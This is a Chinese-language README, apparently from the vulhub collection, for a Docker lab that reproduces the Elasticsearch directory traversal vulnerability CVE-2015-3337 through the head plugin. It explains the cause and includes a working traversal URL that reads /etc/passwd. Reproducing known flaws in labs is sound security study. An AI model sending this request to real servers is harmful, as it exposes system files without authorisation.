ElasticSearch 目录穿越漏洞(CVE-2015-3337)测试环境

jre版本:openjdk:8-jre

elasticsearch版本:v1.4.4

影响版本:1.4.5以下/1.5.2以下

原理

在安装了具有“site”功能的插件以后,插件目录使用../即可向上跳转,导致目录穿越漏洞,可读取任意文件。没有安装任意插件的elasticsearch不受影响。

测试环境

编译及运行测试环境

docker-compose build
docker-compose up -d

测试环境默认安装了一个插件:elasticsearch-head,主页在此:https://github.com/mobz/elasticsearch-head

访问http://your-ip:9200/_plugin/head/../../../../../../../../../etc/passwd读取任意文件(不要在浏览器访问):

head插件

head插件提供了elasticsearch的前端页面,访问 http://your-ip:9200/_plugin/head/ 即可看到,不多说了。

Copied From: vulhub/elasticsearch/CVE-2015-3337